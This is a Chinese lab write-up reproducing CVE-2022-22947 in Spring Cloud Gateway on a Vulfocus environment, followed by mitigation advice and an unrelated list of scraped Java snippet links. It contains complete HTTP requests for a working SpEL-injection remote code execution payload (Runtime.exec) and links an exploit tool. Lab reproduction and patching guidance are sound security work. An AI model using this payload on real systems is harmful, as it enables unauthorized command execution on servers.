00勇士王子
00勇士王子

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

前言

之前我在对一个目标进行测试的时候扫出了spring信息泄露,并利用heapdump查到了Redis的明文密码,以为到这就结束的时候,一个师傅给我说这个站可以rce,我一看,是被我忽略的扫出的第一个路径/actuator/gateway/routes
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第1张图片
这就是经验上的差距了,我不知道存在这个路径就有可能rce,所以我决定拿vulfocus对这个漏洞进行复现,下次再见到这个路径,就一眼能看出来可能存在此漏洞。

介绍

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

【受影响版本】
Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 旧的、不受支持的版本也会受到影响 【安全版本】

Spring Cloud Gateway >= 3.1.1 Spring Cloud Gateway >= 3.0.7
参考链接:
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md

漏洞环境

使用vulfocus搭建docker环境,本文使用的服务器为云服务器,漏洞复现完成后会删除环境
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第2张图片

复现过程

访问ip:8080,出现如下图结果说明环境搭建成功
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第3张图片
首先模拟一下常规渗透测试流程,进行一波扫描,我这里用的是灯塔
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第4张图片
扫描出存在spring的routes模块,可能存在Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞

接下来正式对漏洞进行复现:

首先,burp抓包,发送如下数据包即可添加一个包含恶意SpEL表达式的路由(目的是要执行id命令):

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第5张图片
然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第6张图片
发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第7张图片
可以看到,命令id被成功执行,漏洞复现成功。
最后,因为我们创建了一个恶意的路由,我们测试完漏洞后,可以将我们创建的路由进行删除

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第8张图片
再刷新下路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第9张图片
至此,Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞完美复现成功。

使用工具进行复现

这算是一个比较复杂的漏洞了,实战过程可能比较麻烦,我们可以使用前辈写的工具进行测试。
这里尝试使用在github上搜索到的一款工具:
https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947

下载后直接在cmd中使用,可以看到直接返回了命令id的执行结果,证明该网站存在该漏洞,十分的方便快捷
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)_第10张图片

修复建议

临时修复建议:
如果不需要网关执行器端点,则应通过 management.endpoint.gateway.enabled: false 禁用它。如果需要执行器,则应使用 Spring Security 对其进行保护,请参阅https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security。

通用修复建议:
官方已发布安全版本,请及时下载更新,下载地址:https://github.com/spring-cloud/spring-cloud-gateway

你可能感兴趣的:(漏洞复现,spring,cloud,java,spring)

  • 如何使用Spring IOC的注解进行开发 李李世界爱学Java springjava后端
    目录1、如何使用注解标记和扫描2、如何使用注解配置作用域和周期方法3、如何使用注解进行引用类型自动装配4、如何使用注解对基本类型属性赋值SpringIoC(InversionofControl,控制反转)容器通过注解提供了一种简洁且强大的方式来进行依赖注入和配置管理。注解开发使得Spring应用程序的配置更为简洁和直观,减少了XML配置的冗余和复杂性。注解本身并不能执行,注解本身仅仅只是做一个标记
  • Java之二维数组 2301_80176093 算法
    二维数组的声明及其基本语法声明:[行的坐标][列的坐标]arr基本语法:数据类型[][]数组名称=new数据类型[行数][列数]{初始化数据}代码示例int[][]arr={{1,2,3,4},{5,6,7,8},{9,10,11,12}};for(introw=0;row
  • linux部署jar项目报错_linux jar 服务 国家级做梦冠军 linux部署jar项目报错
    关于linuxjar服务的搜索结果问题linux重启netty服务一些问题,请大神进linux上部署netty架构的服务时我一般启动的时候用下面脚本nohupjava-jarxxx-xxx.jarstart80808888&关闭的时候杀进程就可以了。今天部署的时候启动服务就报userBind,于是我查...杨冬芳2019-12-0120:26:501161浏览量回答数0问题Linux下Tomcat
  • java -jar 后台_【Java】部署jar包并后台运行 简单的艾伦 java-jar后台
    #Linux环境部署:#1、执行jar包的命令和在windows操作系统上是一样java-jarjarName-0.0.1-SNAPSHOT.jar;注:关闭服务器连接时会关闭此程序进程,(推荐测试可用)2、将jar程序设置成后台运行,并且将标准输出的日志重定向至文件msg.lognohupjava-jarjarName-0.0.1-SNAPSHOT.jar>msg.log2>&1&;注:nohu
  • ios-数据库-事务 -FIGHTING- iOS封装数据库事务回滚存储
    概念事务(Transaction)是访问并可能更新数据库中各种数据项的一个程序执行单元(unit)。事务通常由高级数据库操纵语言或编程语言(如SQL,C++或Java)书写的用户程序的执行所引起,并用形如begintransaction和endtransaction语句(或函数调用)来界定。事务由事务开始(begintransaction)和事务结束(endtransaction)之间执行的全体操
  • Interface-接口 青山^ java开发语言
    接口(Interface)在编程中是一种规范或者契约,它定义了一组方法(在某些编程语言中还包括属性、事件等),但不提供这些方法的具体实现。接口只规定了类必须做什么,而不规定如何去做。实现接口的类必须实现接口中定义的所有方法。1.定义要点接口声明接口使用特定的关键字进行声明,例如在Java中使用interface关键字,在C#和TypeScript中也使用interface。方法声明接口中定义的方法
  • Linux中启动与停止jar包 橙子的胖胖 linux运维服务器
    Linux中启动与停止jar包启动jar包方式一:直接用命令启动命令:nohupjava-jar/myproject/yepcommongogogo/service_user/service_user.jar>>user.log&方式二:脚本的方式启动#!/bin/start.shnohupjava-jar/myproject/yepcommongogogo/service_user/servic
  • springboot使用logback 大海星辰798 springbootlogback后端
    1、在src/main/resources下添加logback-spring.xml(springboot会自动识别改配置文件),配置如下:${LOG_DIR}/logs/%d{yyyy-MM,aux}/current-%d{yyyy-MM-dd}.log30%d{yyyy-MM-ddHH:mm:ss.SSS}[%thread]%-5level%logger{36}-%msg%n%d{yyyy-M
  • 【震惊】没有java环境也能运行jar,在不安装jdk下如何运行jar包 大海星辰798 javawindowsjava自动化
    1、首先把jdk下的jre拷贝出来,放到无java环境的Windows电脑2、编写运行脚本,path指向jre路径下的bin,-jar后为对应jar包@echooffsetpath=E:\projectDirectory\chongq\jar\ag-hikvision\jre\binSTART"middle""%path%\javaw"-jar***.jar3、这样就可以一键启动啦,是不是很简单!
  • javaScript如何判断一个对象是否存在某个属性 道长道长IOT javascript开发语言
    在JavaScript中检查一个对象是否包含某个属性可以通过几种不同的方法实现。以下是几种常用的方法:1.in操作符in操作符可以用来检测一个属性是否存在于对象中,包括原型链上的属性。constobj={foo:'bar'};if('foo'inobj){console.log('fooisintheobject');}2.hasOwnProperty()方法hasOwnProperty()方法只
  • linux 系统 shell 脚本,实现【查找进程,杀进程,启动 jar 包,打印输出日志】 ilyuc 运维相关
    先创建一个shell文件touchrestart.sh编写内容vimrestart.sh输入以下内容#!/bin/shAPP_NAME=dp.jarPID=`ps-ef|grepjava|grep$APP_NAME|awk'{print$2}'`echo"finddp.jarPID:$PID"kill-9$PIDecho"killeddp.jarPID:$PID"nohupjava-jardp.j
  • linux启动停止jar包、war包项目 小南城_ Linuxjarlinuxtomcat
    jar包项目启动命令:java-jara.jarnohup意思是不挂断运行命令,当账户退出或终端关闭时,程序仍然运行nohupjava-jara.jar&(&代表在后台运行)指定输出日志的文件nohupjava-jara.jar>nohup.out查看实时日志记录tail-fnohup.out查看最后1000条日志记录tail-1000nouhp.out停止命令:方式一:知道端口8095是系统启动
  • hive中的数据同步到hbase 流~星~雨 大数据相关hivehbasehadoop
    hive中的数据同步到hbase工作中遇到了这个工作,就是将hive中的数据同步到hbase中,然后java通过hbase相关的API来访问hbase中的数据。关于hadoop,hive,hbase这三个技术栈我写了两篇博客简单的分享了我对这三个技术栈的一些看法,在我目前的认知里,hadoop提供hdfs这个组件来存储大数据量的数据(相比于mysql,oracle这些关系型数据库),然后提供了Ma
  • 关于严格模式的具体分析 6230_ 前端基础javascript开发语言ecmascript前端html改行学it学习方法
    1、什么是ES5概念:ES5指的是:ECMAScript5,它是JavaScript语言的国际标准。ES5通过对现有JavaScript方法添加语句和原生ECMAScript对象做合并实现标准化还引入了一个语法的严格变种,被称为“严格模式”。2、如何开启严格模式写法:"usestrict"解释:只要将"usestrict"这个字符串放在代码的前方,后面的代码就会按照严格模式进行解释开启类型:局部开
  • javaweb基于ssm框架校园即时服务平台管理系统设计与实现 ancen_73bd
    1、项目介绍系统开发平台:JDK1.8+Windows7+Maven3.6.1开发语言:Java后台框架:SSM前端:layui数据库:MySql5.7Navicat开发环境:IntellijIdea浏览器:Chrome或360浏览器本系统分为两个用户:学生、管理员。学生:可以发布任务、已接受任务、已发布任务、资料修改管理员:可以对用户进行管理、任务的管理、安全设置管理2、项目技术后端框架:SSM
  • JavaScript 深度剖析 - 函数式编程范式 时光海丶 大前端javascript函数式编程
    函数式编程范式1.1函数式编程概念函数是一等公民高阶函数闭包1.2纯函数概念功能库lodash优劣纯函数的好处纯函数的副作用1.3柯里化(HaskellBrooksCurry)概念lodash中的柯里化函数总结1.4函数组合(compose)管道函数组合1.5Lodash中的fp模块1.6PointFree模式1.7函子Functor函子MayBe函子Either函子IO函子Task函子Point
  • 阿里云Apsara Clouder专项技能认证:实现调用API IT菌
    阿里云ApsaraClouder专项技能认证之实现调用API接口,此项认证的功能要求开发者熟悉使用阿里云市场的API接口调用,关于API开发可见阿里云帮助文档-应用服务-API网关,里面有详细的基于云市场开发与调用API的文档和视频,想要做一点东东的童鞋还是以这里为准吧,毕竟实战才是真理。话又说回来,《ApsaraClouder专项技能认证:实现调用API接口》这门认证可作为开发者刚从事API学习
  • Java设计模式七大原则-开闭原则 zoeil Java设计模式
    开闭原则基本介绍开闭原则(OpenClosedPrinciple)是编程中最基础、最重要的设计原则一个软件实体如类,模块和函数应该对扩展开放(对提供方),对修改关闭(对使用方)。用抽象构建框架,用实现扩展细节。当软件需要变化时,尽量通过扩展软件实体的行为来实现变化,而不是通过修改已有的代码来实现变化。编程中遵循其它原则,以及使用设计模式的目的就是遵循开闭原则。例子publicclassOcp{pu
  • JSON的概念及应用场景举例 可靠百灵鸟 json
    JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,它采用易于人阅读和机器解析的纯文本形式来表示结构化的数据。JSON基于ECMAScript(即JavaScript)的一个子集,但其语法和数据结构独立于任何特定的编程语言,因此被广泛应用于各种编程环境和平台之间进行数据交换。JSON概念的关键特性包括:文本格式:JSON以纯文本的形式展现,由字符组成,可轻松通过
  • 为什么阿里规定需要在事务注解@Transactional中指定rollbackFor? 码农小光
    作者:Mint6来源:https://blog.csdn.net/Mint6/article/details/78363761Java阿里巴巴规范提示:方法【edit】需要在Transactional注解指定rollbackFor或者在方法中显示的rollback。异常的分类先来看看异常的分类imageerror是一定会回滚的。这里Exception是异常,他又分为运行时异常RuntimeExce
  • 探秘Appium:自动化移动应用测试的新篇章 房耿园Hartley
    探秘Appium:自动化移动应用测试的新篇章项目简介Appium是一个开源的自动化测试框架,它允许开发者对原生(Native)、混合(Hybrid)以及移动Web应用程序进行自动化测试。无论你的应用程序是基于iOS还是Android平台,Appium都能提供一套统一的API,让你以熟悉的编程语言如Java、Python、Ruby等编写测试脚本。技术分析WebDriver接口Appium的核心理念是
  • npm缓存深度解析:理解、使用与清除指南 2401_85762266 npm缓存前端
    npm缓存深度解析:理解、使用与清除指南npm(NodePackageManager)是JavaScript编程语言的包管理器,广泛用于Node.js应用程序。它不仅帮助我们安装和管理项目依赖,还拥有一个强大的缓存机制来加速这一过程。本文将深入探讨npm缓存的概念、使用场景以及如何有效清除缓存,确保你的开发环境保持最佳状态。#️⃣npm缓存简介npm缓存是一个本地存储机制,用于保存已下载的包,以便
  • RabbitMQ实战-JavaDemo StaticKing RabbitMQrabbitmq分布式
    目录前言消息生产者消息消费者消息确认机制消息持久化Maven依赖总结前言在使用RabbitMQ进行消息传递时,了解如何在代码中创建和发布消息(生产者)、接收和处理消息(消费者),以及配置消息确认机制和持久化,是确保系统可靠性和效率的关键。以下将详细解读这些概念,并提供相应的Java示例代码和Maven依赖。注:如果是跟着笔者一步步认识RabbitMQ以及手动搭建Rabbit,则需要注意,在搭建Ra
  • Java大文件上传方案(vue+饿了么):秒传、断点续传、分片上传! 无与丶伦比丨 java开发语言
    前言本篇文章是基于其他文章的基础上结合自己的理解写出来的,如果哪里有问题请指出!详细教程秒传1、什么是秒传通俗的说,你把要上传的东西上传,服务器会先做MD5校验,如果服务器上有它就会进入秒传,想要不秒传,其实只要让MD5改变,就是对文件本身做一下修改(改名字不行),例如一个文本文件,你多加几个字,MD5就变了,就不会秒传了.2、本文实现的秒传核心逻辑a、利用redis的set方法存放文件上传状态,
  • java ftp主动模式和被动模式_什么是ftp主动模式和被动模式 weixin_39904809 javaftp主动模式和被动模式
    FTP是文件传输协议的简称,ftp传输协议有着众多的优点所以传输文件时使用ftp协议的软件很多,ftp协议使用的端口是21(也称为控制端口),其实还有一个数据端口20,根据FTP工作方式的不同,数据端口也不都是20,主动模式的被动模式使用的数据端口是不一样的,下面我就一步一步介绍主动ftp模式和被动ftp模式的区别:一、什么是主动FTP主动模式的FTP工作原理:客户端从一个任意的非特权端口N连接到
  • java表单布局,QML表单布局(GridLayout)的麻烦 黄元正 java表单布局
    问题是包含Button的Item没有设置高度.在调试布局问题时,首先要检查这类问题.您可以通过打印项目的几何图形来完成此操作:Item{Layout.columnSpan:2Layout.fillWidth:trueComponent.onCompleted:print(x,y,width,height)Button{anchors.centerIn:parenttext:"Enter"onCli
  • 笔记二十二:Kafka基础 转通下水道的粉色钻头 笔记kafka分布式
    消息队列简称为MQ,指的就是数据在一个容器中,从容器一端传递到另一端的操作消息队列,只能暂存数据,不能永久存储数据作用:1)应用解耦合2)异步处理3)限流削峰消息队列的协议:JMS(JavaMessageServer)角色:生产者(Producer)消费者(Consumer)消费模型:#1.点对点消费模型指的一条消息最终只能被一个消费者所消费#2.发布订阅消费模型指的一条消息最终被多个消费者所消费
  • Java高并发秒杀 小螺丝钉cici
    高并发下的事务秒杀业务场景具有典型的“事务”特性秒杀红包类需求常见Demo:https://github.com/sunzeying/seckill视频来源:https://www.imooc.com/video/11830image.pngimage.png秒杀事务相关:(减库存,记录购买明细)->事务处理->数据落地MySQL实现秒杀难点分析:难点问题:竞争(多个用户同时秒杀这个商品。就产生了
  • 编程小白如何成为大神?大学新生的最佳入门大神级攻略 一禅(OneZen) 随笔经验分享其他笔记pythonjava
    编程语言选择1.选择一种编程语言入门:Python:Python是初学者的绝佳选择。它语法简单、易读易写、用途广泛,广泛应用于数据科学、机器学习、Web开发、自动化测试等领域。JavaScript:对于对Web开发感兴趣的学生,JavaScript是必学的。它在前端开发中占据主导地位,并且与HTML和CSS结合使用,构建动态网页。Java:Java是一种面向对象的编程语言,广泛应用于企业级应用和A
  • 如何从零开始学习Java语言 一禅(OneZen) 随笔
    1、如何从零开始学习Java语言许多朋友在学习新的语言上有些困惑,如何学好Java语言。如何学好Java语言,分二种技术人员1)第一种:有编程语言的技术人员IT行业的朋友,应为本事就有编程语言的技术,学习Java语言不是困难的事情。所谓的懂一门语言就会其他语言。为什么这么说,应他们有一些编程的基本知识,他们知道如何去学习技术。(但这里有一点却记:不要认为自己懂了一门编程语言就学习其他语言很简单。就
  • 集合框架 天子之骄 java数据结构集合框架
       集合框架 集合框架可以理解为一个容器,该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 从本质上来说,Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。   简单介绍:   Collection接口是最基本的接口,它定义了List和Set,List又定义了LinkLi
  • Table Driven(表驱动)方法实例 bijian1013 javaenumTable Driven表驱动
    实例一: /** * 驾驶人年龄段 * 保险行业,会对驾驶人的年龄做年龄段的区分判断 * 驾驶人年龄段:01-[18,25);02-[25,30);03-[30-35);04-[35,40);05-[40,45);06-[45,50);07-[50-55);08-[55,+∞) */ public class AgePeriodTest { //if...el
  • Jquery 总结 cuishikuan javajqueryAjaxWebjquery方法
    1.$.trim方法用于移除字符串头部和尾部多余的空格。如:$.trim('   Hello   ') // Hello2.$.contains方法返回一个布尔值,表示某个DOM元素(第二个参数)是否为另一个DOM元素(第一个参数)的下级元素。如:$.contains(document.documentElement, document.body); 3.$
  • 面向对象概念的提出 麦田的设计者 java面向对象面向过程
            面向对象中,一切都是由对象展开的,组织代码,封装数据。   在台湾面向对象被翻译为了面向物件编程,这充分说明了,这种编程强调实体。       下面就结合编程语言的发展史,聊一聊面向过程和面向对象。      c语言由贝尔实
  • linux网口绑定 被触发 linux
    刚在一台IBM Xserver服务器上装了RedHat Linux Enterprise AS 4,为了提高网络的可靠性配置双网卡绑定。 一、环境描述 我的RedHat Linux Enterprise AS 4安装双口的Intel千兆网卡,通过ifconfig -a命令看到eth0和eth1两张网卡。 二、双网卡绑定步骤: 2.1 修改/etc/sysconfig/network
  • XML基础语法 肆无忌惮_ xml
    一、什么是XML? XML全称是Extensible Markup Language,可扩展标记语言。很类似HTML。XML的目的是传输数据而非显示数据。XML的标签没有被预定义,你需要自行定义标签。XML被设计为具有自我描述性。是W3C的推荐标准。   二、为什么学习XML? 用来解决程序间数据传输的格式问题 做配置文件 充当小型数据库   三、XML与HTM
  • 为网页添加自己喜欢的字体 知了ing 字体 秒表 css
    @font-face { font-family: miaobiao;//定义字体名字 font-style: normal; font-weight: 400; src: url('font/DS-DIGI-e.eot');//字体文件 } 使用: <label style="font-size:18px;font-famil
  • redis范围查询应用-查找IP所在城市 矮蛋蛋 redis
    原文地址: http://www.tuicool.com/articles/BrURbqV 需求 根据IP找到对应的城市 原来的解决方案 oracle表(ip_country): 查询IP对应的城市: 1.把a.b.c.d这样格式的IP转为一个数字,例如为把210.21.224.34转为3524648994 2. select city from ip_
  • 输入两个整数, 计算百分比 alleni123 java
    public static String getPercent(int x, int total){ double result=(x*1.0)/(total*1.0); System.out.println(result); DecimalFormat df1=new DecimalFormat("0.0000%");
  • 百合——————>怎么学习计算机语言 百合不是茶 java 移动开发
        对于一个从没有接触过计算机语言的人来说,一上来就学面向对象,就算是心里上面接受的了,灵魂我觉得也应该是跟不上的,学不好是很正常的现象,计算机语言老师讲的再多,你在课堂上面跟着老师听的再多,我觉得你应该还是学不会的,最主要的原因是你根本没有想过该怎么来学习计算机编程语言,记得大一的时候金山网络公司在湖大招聘我们学校一个才来大学几天的被金山网络录取,一个刚到大学的就能够去和
  • linux下tomcat开机自启动 bijian1013 tomcat
    方法一: 修改Tomcat/bin/startup.sh 为: export JAVA_HOME=/home/java1.6.0_27 export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jar:. export PATH=$JAVA_HOME/bin:$PATH export CATALINA_H
  • spring aop实例 bijian1013 javaspringAOP
    1.AdviceMethods.java package com.bijian.study.spring.aop.schema; public class AdviceMethods { public void preGreeting() { System.out.println("--how are you!--"); } } 2.beans.x
  • [Gson八]GsonBuilder序列化和反序列化选项enableComplexMapKeySerialization bit1129 serialization
    enableComplexMapKeySerialization配置项的含义  Gson在序列化Map时,默认情况下,是调用Key的toString方法得到它的JSON字符串的Key,对于简单类型和字符串类型,这没有问题,但是对于复杂数据对象,如果对象没有覆写toString方法,那么默认的toString方法将得到这个对象的Hash地址。   GsonBuilder用于
  • 【Spark九十一】Spark Streaming整合Kafka一些值得关注的问题 bit1129 Stream
    包括Spark Streaming在内的实时计算数据可靠性指的是三种级别: 1. At most once,数据最多只能接受一次,有可能接收不到 2. At least once, 数据至少接受一次,有可能重复接收 3. Exactly once  数据保证被处理并且只被处理一次,   具体的多读几遍http://spark.apache.org/docs/lates
  • shell脚本批量检测端口是否被占用脚本 ronin47
    #!/bin/bash cat ports |while read line do#nc -z -w 10 $line nc -z -w 2 $line 58422>/dev/null2>&1if[ $?-eq 0]then echo $line:ok else echo $line:fail fi done 这里的ports 既可以是文件
  • java-2.设计包含min函数的栈 bylijinnan java
    具体思路参见:http://zhedahht.blog.163.com/blog/static/25411174200712895228171/ import java.util.ArrayList; import java.util.List; public class MinStack { //maybe we can use origin array rathe
  • Netty源码学习-ChannelHandler bylijinnan javanetty
    一般来说,“有状态”的ChannelHandler不应该是“共享”的,“无状态”的ChannelHandler则可“共享” 例如ObjectEncoder是“共享”的, 但 ObjectDecoder 不是 因为每一次调用decode方法时,可能数据未接收完全(incomplete), 它与上一次decode时接收到的数据“累计”起来才有可能是完整的数据,是“有状态”的 p
  • java生成随机数 cngolon java
    方法一: /** * 生成随机数 * @author [email protected] * @return */ public synchronized static String getChargeSequenceNum(String pre){ StringBuffer sequenceNum = new StringBuffer(); Date dateTime = new D
  • POI读写海量数据 ctrain 海量数据
    import java.io.FileOutputStream; import java.io.OutputStream; import org.apache.poi.xssf.streaming.SXSSFRow; import org.apache.poi.xssf.streaming.SXSSFSheet; import org.apache.poi.xssf.streaming
  • mysql 日期格式化date_format详细使用 daizj mysqldate_format日期格式转换日期格式化
    日期转换函数的详细使用说明  DATE_FORMAT(date,format) Formats the date value according to the format string. The following specifiers may be used in the format string. The&n
  • 一个程序员分享8年的开发经验 dcj3sjt126com 程序员
      在中国有很多人都认为IT行为是吃青春饭的,如果过了30岁就很难有机会再发展下去!其实现实并不是这样子的,在下从事.NET及JAVA方面的开发的也有8年的时间了,在这里在下想凭借自己的亲身经历,与大家一起探讨一下。 明确入行的目的 很多人干IT这一行都冲着“收入高”这一点的,因为只要学会一点HTML, DIV+CSS,要做一个页面开发人员并不是一件难事,而且做一个页面开发人员更容
  • android欢迎界面淡入淡出效果 dcj3sjt126com android
    很多Android应用一开始都会有一个欢迎界面,淡入淡出效果也是用得非常多的,下面来实现一下。 主要代码如下: package com.myaibang.activity; import android.app.Activity;import android.content.Intent;import android.os.Bundle;import android.os.CountDown
  • linux 复习笔记之常见压缩命令 eksliang tar解压linux系统常见压缩命令linux压缩命令tar压缩
    转载请出自出处:http://eksliang.iteye.com/blog/2109693 linux中常见压缩文件的拓展名 *.gz gzip程序压缩的文件 *.bz2 bzip程序压缩的文件 *.tar tar程序打包的数据,没有经过压缩 *.tar.gz tar程序打包后,并经过gzip程序压缩 *.tar.bz2 tar程序打包后,并经过bzip程序压缩 *.zi
  • Android 应用程序发送shell命令 gqdy365 android
    项目中需要直接在APP中通过发送shell指令来控制lcd灯,其实按理说应该是方案公司在调好lcd灯驱动之后直接通过service送接口上来给APP,APP调用就可以控制了,这是正规流程,但我们项目的方案商用的mtk方案,方案公司又没人会改,只调好了驱动,让应用程序自己实现灯的控制,这不蛋疼嘛!!!! 发就发吧! 一、关于shell指令: 我们知道,shell指令是Linux里面带的
  • java 无损读取文本文件 hw1287789687 读取文件无损读取读取文本文件charset
    java 如何无损读取文本文件呢? 以下是有损的 @Deprecated public static String getFullContent(File file, String charset) { BufferedReader reader = null; if (!file.exists()) { System.out.println("getFull
  • Firebase 相关文章索引 justjavac firebase
    Awesome Firebase 最近谷歌收购Firebase的新闻又将Firebase拉入了人们的视野,于是我做了这个 github 项目。 Firebase 是一个数据同步的云服务,不同于 Dropbox 的「文件」,Firebase 同步的是「数据」,服务对象是网站开发者,帮助他们开发具有「实时」(Real-Time)特性的应用。 开发者只需引用一个 API 库文件就可以使用标准 RE
  • C++学习重点 lx.asymmetric C++笔记
    1.c++面向对象的三个特性:封装性,继承性以及多态性。   2.标识符的命名规则:由字母和下划线开头,同时由字母、数字或下划线组成;不能与系统关键字重名。   3.c++语言常量包括整型常量、浮点型常量、布尔常量、字符型常量和字符串性常量。   4.运算符按其功能开以分为六类:算术运算符、位运算符、关系运算符、逻辑运算符、赋值运算符和条件运算符。 &n
  • java bean和xml相互转换 q821424508 javabeanxmlxml和bean转换java bean和xml转换
    这几天在做微信公众号 做的过程中想找个java bean转xml的工具,找了几个用着不知道是配置不好还是怎么回事,都会有一些问题, 然后脑子一热谢了一个javabean和xml的转换的工具里,自己用着还行,虽然有一些约束吧 , 还是贴出来记录一下      顺便你提一下下,这个转换工具支持属性为集合、数组和非基本属性的对象。   packag
  • C 语言初级 位运算 1140566087 位运算c
    第十章 位运算   1、位运算对象只能是整形或字符型数据,在VC6.0中int型数据占4个字节   2、位运算符: 运算符 作用 ~ 按位求反 << 左移 >> 右移 & 按位与 ^ 按位异或 | 按位或 他们的优先级从高到低;   3、位运算符的运算功能: a、按位取反: ~01001101 = 101
  • 14点睛Spring4.1-脚本编程 wiselyman spring4
    14.1 Scripting脚本编程 脚本语言和java这类静态的语言的主要区别是:脚本语言无需编译,源码直接可运行; 如果我们经常需要修改的某些代码,每一次我们至少要进行编译,打包,重新部署的操作,步骤相当麻烦; 如果我们的应用不允许重启,这在现实的情况中也是很常见的; 在spring中使用脚本编程给上述的应用场景提供了解决方案,即动态加载bean; spring支持脚本
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他